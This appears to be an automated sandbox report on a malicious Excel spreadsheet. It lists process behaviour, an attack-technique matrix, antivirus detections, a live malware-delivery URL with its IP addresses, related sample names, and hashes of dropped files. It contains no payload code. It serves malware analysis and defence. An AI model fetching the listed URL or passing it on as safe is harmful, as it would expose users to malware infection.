Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: Order_948575494759.xlsStream path 'MBD0191BFB8/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: Order_948575494759.xlsStream path 'Workbook' entropy: 7.99854241372 (max. 8.0)
Source: E1A40000.0.drStream path 'MBD0191BFB8/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: E1A40000.0.drStream path 'Workbook' entropy: 7.98259075256 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 741Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Extra Window Memory Injection
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Order_948575494759.xls18%ReversingLabs
Order_948575494759.xls100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus100%Avira URL Cloudmalware
https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus(Y100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    high
    s-part-0035.t-0009.t-msedge.net
    13.107.246.63
    truefalse
      high
      curt.wiz.co.cdn.gocache.net
      170.82.173.30
      truefalse
        high
        curt.wiz.co
        unknown
        unknownfalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexusfalse
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus(YOrder_948575494759.xls, E1A40000.0.drfalse
          • Avira URL Cloud: malware
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          173.214.167.74
          unknownUnited States
          19318IS-AS-1USfalse
          170.82.173.30
          curt.wiz.co.cdn.gocache.netBrazil
          2664443LCLOUDINTERNETSERVICESLTDA-EPPBRfalse
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1577527
          Start date and time:2024-12-18 14:59:59 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 5m 26s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:12
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • GSI enabled (VBA)
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:Order_948575494759.xls
          Detection:MAL
          Classification:mal80.expl.winXLS@6/42@2/2
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .xls
          • Changed system and user locale, location and keyboard layout to French - France
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Active ActiveX Object
          • Active ActiveX Object
          • Active ActiveX Object
          • Active ActiveX Object
          • Active ActiveX Object
          • Scroll down
          • Close Viewer
          • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, svchost.exe, MavInject32.exe
          • Excluded IPs from analysis (whitelisted): 52.109.76.240, 52.113.194.132, 23.218.208.109, 52.109.89.19, 23.50.131.216, 23.50.131.200, 20.42.72.131, 52.109.32.97, 104.208.16.89, 13.107.246.63, 172.202.163.200, 40.126.53.6
          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, weu-azsc-000.roaming.officeapps.live.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, ocsp.digicert.com, login.live.com, onedscolprdcus11.centralus.cloudapp.azure.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ukw-azsc-config.officeapps.live.com, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtOpenFile calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadFile calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: Order_948575494759.xls
          TimeTypeDescription
          09:02:08API Interceptor803x Sleep call for process: splwow64.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          170.82.173.30eQcKjYOV30.exeGet hashmaliciousPushdoBrowse
          • www.mqs.com.br/
          file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
          • www.mqs.com.br/
          file.exeGet hashmaliciousPushdo, SmokeLoaderBrowse
          • www.mqs.com.br/
          file.exeGet hashmaliciousPushdo, SmokeLoaderBrowse
          • www.mqs.com.br/
          0fmEh2zmDj.exeGet hashmaliciousPushdoBrowse
          • www.mqs.com.br/
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          s-part-0035.t-0009.t-msedge.netldqj18tn.exeGet hashmaliciousUnknownBrowse
          • 13.107.246.63
          DOC.exeGet hashmaliciousCryptbotBrowse
          • 13.107.246.63
          2.png.ps1Get hashmaliciousUnknownBrowse
          • 13.107.246.63
          1.png.ps1Get hashmaliciousUnknownBrowse
          • 13.107.246.63
          ko.ps1.2.ps1Get hashmaliciousUnknownBrowse
          • 13.107.246.63
          kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
          • 13.107.246.63
          steel.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
          • 13.107.246.63
          random.exe.17.exeGet hashmaliciousScreenConnect ToolBrowse
          • 13.107.246.63
          steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
          • 13.107.246.63
          newwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
          • 13.107.246.63
          curt.wiz.co.cdn.gocache.netDocument.xlaGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Document.xla.xlsxGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          bg.microsoft.map.fastly.netDocuStream_Scan_l8obgs3v.pdfGet hashmaliciousHTMLPhisherBrowse
          • 199.232.214.172
          stail.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
          • 199.232.214.172
          22TxDBB1.batGet hashmaliciousUnknownBrowse
          • 199.232.214.172
          sxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
          • 199.232.210.172
          pyld611114.exeGet hashmaliciousUnknownBrowse
          • 199.232.210.172
          Lu4421.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
          • 199.232.214.172
          do.ps1Get hashmaliciousUnknownBrowse
          • 199.232.214.172
          Opdxdyeul.exeGet hashmaliciousSystemBCBrowse
          • 199.232.210.172
          YcxjdYUKIb.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
          • 199.232.210.172
          xxx.ps1Get hashmaliciousAsyncRATBrowse
          • 199.232.210.172
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          3LCLOUDINTERNETSERVICESLTDA-EPPBRDocument.xlaGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Document.xla.xlsxGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          IS-AS-1USnetworkmanager.exeGet hashmaliciousUnknownBrowse
          • 66.45.226.53
          arm6.elfGet hashmaliciousUnknownBrowse
          • 208.73.200.113
          jAktiuZ9R3.msiGet hashmaliciousUnknownBrowse
          • 162.220.166.184
          S54zm7jsZe.msiGet hashmaliciousUnknownBrowse
          • 162.220.166.184
          https://dashboard.sizle.io/p/f7c9cdf19Get hashmaliciousHTMLPhisherBrowse
          • 174.138.189.57
          fWAr4zGUkY.exeGet hashmaliciousRemcos, Amadey, StealcBrowse
          • 66.45.226.53
          file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRATBrowse
          • 205.209.109.10
          file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
          • 205.209.109.10
          file.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
          • 205.209.109.10
          http://74.50.69.234/Get hashmaliciousUnknownBrowse
          • 74.50.69.234
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          6271f898ce5be7dd52b0fc260d0662b3YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          https://ce4.ajax.a8b.co/get?redir=1&id=d4vCW7zizPl1mo0GYx0ELgo+CCIybH9/c4qC7CeWEuI=&uri=//the-western-fire-chiefs-association.jimdosite.comGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          IIC0XbKFjS.lnkGet hashmaliciousRHADAMANTHYSBrowse
          • 170.82.173.30
          Document.xlaGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          V65xPrgEHH.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
          • 170.82.173.30
          #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Document.xla.xlsxGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          No context
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):118
          Entropy (8bit):3.5700810731231707
          Encrypted:false
          SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
          MD5:573220372DA4ED487441611079B623CD
          SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
          SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
          SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
          Malicious:false
          Reputation:high, very likely benign file
          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
          Category:dropped
          Size (bytes):4761
          Entropy (8bit):7.945585251880973
          Encrypted:false
          SSDEEP:96:6ZUpZsm0HwZ8FLSeXs+aiL9qcZ7KtlAD1GlNHgdkVI5F11AcNmwkVFzGz6ENhZC7:62T0QOLl8vAqcZ7K3AUNAdx5FAx9VEOj
          MD5:77B20B5CD41BC6BB475CCA3F91AE6E3C
          SHA1:9E98ACE72BD2AB931341427A856EF4CEA6FAF806
          SHA-256:5511A9B9F9144ED7BDE4CCB074733B7C564D918D2A8B10D391AFC6BE5B3B1509
          SHA-512:3537DA5E7F3ABA3DAFE6A86E9511ABA20B7A3D34F30AEA6CC11FEEF7768BD63C0C85679C49E99C3291BD1B552DED2C6973B6C2F7F6D731BCFACECAB218E72FD4
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview:MSCF............,...................O..................YWP .disallowedcert.stl.lJ..B...CK.wTS.....{.&Uz.I."E".HS@. .P.!.....*E. .DQ..... EDA.H. E..""/.s<.s.9.....&#.{~k.VV..7@......b.R....MdT..B.L..%.C......" ....%.4%..%*.B..T.d...S.....pem..$....&.q.`.+...E..C.....$.|.A.!~d.H>w%S$...QC't..;..<..R@....2. .l..?..c..A....Ew...l..K$.. ~...'......Mt^c..s.Y%..}......h......m....h.......~d...,...=ge3.....2%..(...T..!].....!C~.X..MHU.o[.z].Y...&lXG;uW.:...2!..][\/.G..]6#.I...S..#F.X.k.j.....)Nc.].t^.-l.Y...4?.b...rY....A......7.D.H\.R...s.L,.6.*|.....VQ....<.*.......... [Z....].N0LU.X........6..C\....F.....KbZ..^=.@.B..MyH...%.2.>...]..E.....sZ.f..3z.].Y.t.d$.....P...,. .~..mNZ[PL.<....d..+...l.-...b.^....6F..z.&.;D.._..c."...d..... k9....60?&..Y.v.dgu...{.....{..d=..$......@^..qA..*uJ..@W.V..eC..AV.e+21...N.{.]..]..f]..`Z.....]2.....x..f..K...t. ...e.V.U.$PV..@6W\_nsm.n.........A<.......d....@f..Z... >R..k.....8..Y....E>..2o7..........c..K7n....
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):340
          Entropy (8bit):3.161795687885784
          Encrypted:false
          SSDEEP:6:kKl5g5+7DYUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:WLkPlE99SCQl2DUeXJlOA
          MD5:9E5E75D425A7D30E3CE0F4D3B5DDFEE9
          SHA1:0CA3AFC23A9C8E40A5BE726FF9FE844834983CAA
          SHA-256:D174F28B2CEF739A18666B4A09F8A2AF072211C30C06DCBC8A2E00359D2567F3
          SHA-512:A05BE2DB66B1C6F814FD92A9372D13944A36DAB51C54C19AD48C4C424653BFBB0D89EA6B4DE8908EA5807533663C1FBD6083E1047E056904613D76A0F7EF84F2
          Malicious:false
          Preview:p...... ..........\JUQ..(....................................................... ........~..MG......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):934
          Entropy (8bit):2.7129194926077287
          Encrypted:false
          SSDEEP:24:YIrNvpCHhFGMfzLRwcftR/8AJp9WtAZRJ5poIHWPZfp:YmbCHaMfzLmcL8AJtfJ52IH2ZB
          MD5:B84DC9A70357CE4B06F0833A82C37369
          SHA1:C2FEF77BD96A6A7A9519DBC0318F51E74B7D3277
          SHA-256:1FC1E853D3B7FB897F4147B40F85547488C438146D117ED53691128ACF5D5076
          SHA-512:8B1F36ECB53789AA3B63E6B27A2D0C9C399DA4DA558AFA919FB05153112F10D250C4C214420BBEE70184142AB218354F2C91EFAB333823B39C7129D2C4A0961A
          Malicious:false
